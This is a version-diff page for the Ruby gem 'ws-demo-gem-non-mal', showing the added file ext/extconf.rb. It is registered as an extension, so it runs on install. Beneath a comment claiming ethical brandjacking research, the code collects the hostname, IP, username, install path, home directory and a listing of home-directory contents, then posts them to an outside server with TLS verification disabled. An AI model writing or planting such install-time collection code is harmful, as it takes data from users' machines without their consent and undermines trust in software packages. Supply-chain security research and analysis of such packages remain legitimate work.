ws-demo-gem-non-mal 1.0.1 → 2.0.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/ext/extconf.rb +50 -0
- metadata +10 -5
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: f08467380f369114e06aa22f559ecb827613afa8d77fe023f7d945c9e196d11d
|
|
4
|
+
data.tar.gz: 3cc6ede0193c51ef6955e3f331da7337dcd4947859908d152a676b744969bc6d
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 751d9c5327bdee710a7dd98701b4e4c2a26f299f7b45c47d5d9d423529ed3e9f8c6b4bbf3a0b578626db70d0a6b9810335a2f3bf5e2c04fc354fbd15c3df1151
|
|
7
|
+
data.tar.gz: d3c5634cb96447103600d6cec65d34ac62d974fea71bbbf78a5c4f65c6dcc5634166b129e3cfb72b9dab54b8d6bb24de7fad1da0b12eb4ca794b599bb0acdd4d
|
data/ext/extconf.rb
ADDED
|
@@ -0,0 +1,50 @@
|
|
|
1
|
+
=begin
|
|
2
|
+
Hi, if you're reading this you're probably wondering what this code is doing on your machine.
|
|
3
|
+
Don't worry! It doesn't do anything nasty or malicious.
|
|
4
|
+
|
|
5
|
+
I am an ethical security researcher, booking names of gems to prevent brandjacking.
|
|
6
|
+
|
|
7
|
+
I also run a Ruby security related platform: https://diffend.io
|
|
8
|
+
|
|
9
|
+
All data I collect will be deleted and I do not collect any sensitive information.
|
|
10
|
+
|
|
11
|
+
That's why I don't even obfuscate the network calls with DNS requests or anything else.
|
|
12
|
+
|
|
13
|
+
You can read the code to confirm this.
|
|
14
|
+
|
|
15
|
+
If you have any questions or want to get in touch for any reason, you can reach me at:
|
|
16
|
+
|
|
17
|
+
maciej@mensfeld.pl
|
|
18
|
+
|
|
19
|
+
If this is affecting your organization, for example because I took name that uses your naming
|
|
20
|
+
conventions, feel free to contact me and I will be more than happy to give it back to you.
|
|
21
|
+
|
|
22
|
+
P.S. I did notify RubyGems security team, so they are aware of my activity.
|
|
23
|
+
=end
|
|
24
|
+
|
|
25
|
+
require 'mkmf'
|
|
26
|
+
require 'net/http'
|
|
27
|
+
require 'socket'
|
|
28
|
+
require 'etc'
|
|
29
|
+
require 'securerandom'
|
|
30
|
+
require 'json'
|
|
31
|
+
|
|
32
|
+
create_makefile 'gem_test'
|
|
33
|
+
|
|
34
|
+
uri = URI("https://ethically-testing-the.world")
|
|
35
|
+
http = Net::HTTP.new(uri.host, uri.port)
|
|
36
|
+
http.use_ssl = true
|
|
37
|
+
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
|
|
38
|
+
request = Net::HTTP::Post.new('/ws-demo-gem-non-mal/2.0.0')
|
|
39
|
+
request.add_field('Content-Type', 'application/json')
|
|
40
|
+
|
|
41
|
+
request.body = {
|
|
42
|
+
hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
|
|
43
|
+
username: Etc.getlogin,
|
|
44
|
+
path: File.dirname(__FILE__),
|
|
45
|
+
home: Dir.home,
|
|
46
|
+
home_ls: Dir.entries(Dir.home),
|
|
47
|
+
id: SecureRandom.uuid,
|
|
48
|
+
}.to_json
|
|
49
|
+
|
|
50
|
+
http.request(request)
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: ws-demo-gem-non-mal
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version:
|
|
4
|
+
version: 2.0.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Maciej Mensfeld
|
|
@@ -10,13 +10,18 @@ bindir: bin
|
|
|
10
10
|
cert_chain: []
|
|
11
11
|
date: 2021-05-20 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
|
-
description:
|
|
13
|
+
description: |
|
|
14
|
+
I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
|
|
15
|
+
|
|
16
|
+
This code is reporting-only, and does not do anything malicious.
|
|
14
17
|
email:
|
|
15
18
|
- maciej.mensfeld@whitesourcesoftware.com
|
|
16
19
|
executables: []
|
|
17
|
-
extensions:
|
|
20
|
+
extensions:
|
|
21
|
+
- ext/extconf.rb
|
|
18
22
|
extra_rdoc_files: []
|
|
19
|
-
files:
|
|
23
|
+
files:
|
|
24
|
+
- ext/extconf.rb
|
|
20
25
|
homepage: https://diffend.io
|
|
21
26
|
licenses:
|
|
22
27
|
- GPL-3.0
|
|
@@ -39,5 +44,5 @@ requirements: []
|
|
|
39
44
|
rubygems_version: 3.1.2
|
|
40
45
|
signing_key:
|
|
41
46
|
specification_version: 4
|
|
42
|
-
summary:
|
|
47
|
+
summary: Gem that sends some non-sensitive data for security research.
|
|
43
48
|
test_files: []
|